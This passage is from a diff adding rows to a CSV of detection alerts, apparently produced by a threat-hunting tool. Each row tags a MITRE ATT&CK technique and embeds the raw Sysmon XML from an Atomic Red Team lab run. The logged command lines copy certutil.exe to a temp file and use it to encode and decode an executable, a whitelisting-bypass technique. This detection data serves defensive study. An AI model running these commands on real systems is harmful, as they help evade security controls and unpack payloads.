+    <Data Name=""ProcessGuid"">747F3D96-DA40-5D31-0000-0010565D3C00</Data>
+    <Data Name=""ProcessId"">3932</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe  /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DA40-5D31-0000-0010CF5A3C00</Data>
+    <Data Name=""ParentProcessId"">4336</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548224.361122,2019-07-19T18:57:04.361122+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:04.333864Z"">
+    </TimeCreated>
+    <EventRecordID>4068</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:04.316</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA40-5D31-0000-0010CF5A3C00</Data>
+    <Data Name=""ProcessId"">4336</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548224.333864,2019-07-19T18:57:04.333864+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe  /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:04.294575Z"">
+    </TimeCreated>
+    <EventRecordID>4067</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:04.256</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA40-5D31-0000-0010B1553C00</Data>
+    <Data Name=""ProcessId"">5168</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe  /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DA40-5D31-0000-00106A543C00</Data>
+    <Data Name=""ParentProcessId"">6572</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548224.294575,2019-07-19T18:57:04.294575+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:04.270645Z"">
+    </TimeCreated>
+    <EventRecordID>4066</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:04.236</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA40-5D31-0000-00106A543C00</Data>
+    <Data Name=""ProcessId"">6572</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548224.270645,2019-07-19T18:57:04.270645+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:04.210561Z"">
+    </TimeCreated>
+    <EventRecordID>4065</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:03.938</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-0010813E3C00</Data>
+    <Data Name=""ProcessId"">7140</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe  -decode file.txt c:\file.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:03.974754Z"">
+    </TimeCreated>
+    <EventRecordID>4064</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:03.818</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-001022323C00</Data>
+    <Data Name=""ProcessId"">6888</Data>
+    <Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">CertUtil.exe</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">certutil.exe  -decode file.txt c:\file.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DA3F-5D31-0000-0010562E3C00</Data>
+    <Data Name=""ParentProcessId"">4020</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -decode file.txt c:\file.exe&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1140] Deobfuscate/Decode Files or Information,1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe  -decode file.txt c:\file.exe ) tried decoding file or information,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:03.974754Z"">
+    </TimeCreated>
+    <EventRecordID>4064</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:03.818</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-001022323C00</Data>
+    <Data Name=""ProcessId"">6888</Data>
+    <Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">CertUtil.exe</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">certutil.exe  -decode file.txt c:\file.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DA3F-5D31-0000-0010562E3C00</Data>
+    <Data Name=""ParentProcessId"">4020</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -decode file.txt c:\file.exe&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548224.210561,2019-07-19T18:57:04.210561+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe  -decode file.txt c:\file.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:03.974754Z"">
+    </TimeCreated>
+    <EventRecordID>4064</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:03.818</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-001022323C00</Data>
+    <Data Name=""ProcessId"">6888</Data>
+    <Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">CertUtil.exe</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">certutil.exe  -decode file.txt c:\file.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DA3F-5D31-0000-0010562E3C00</Data>
+    <Data Name=""ParentProcessId"">4020</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -decode file.txt c:\file.exe&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548223.974754,2019-07-19T18:57:03.974754+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -decode file.txt c:\file.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:03.961276Z"">
+    </TimeCreated>
+    <EventRecordID>4063</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:03.786</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-0010562E3C00</Data>
+    <Data Name=""ProcessId"">4020</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -decode file.txt c:\file.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1563548223.961276,2019-07-19T18:57:03.961276+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil.exe  -encode c:\file.exe file.txt)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:03.309488Z"">
+    </TimeCreated>
+    <EventRecordID>4062</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:03.261</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA3F-5D31-0000-00109E193C00</Data>
+    <Data Name=""ProcessId"">1260</Data>
+    <Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">CertUtil.exe</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">certutil.exe  -encode c:\file.exe file.txt</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DA3F-5D31-0000-00104C173C00</Data>
+    <Data Name=""ParentProcessId"">4832</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;certutil.exe -encode c:\file.exe file.txt&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548223.961276,2019-07-19T18:57:03.961276+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil.exe  -encode c:\file.exe file.txt ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:03.309488Z"">
+    </TimeCreated>
+    <EventRecordID>4062</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
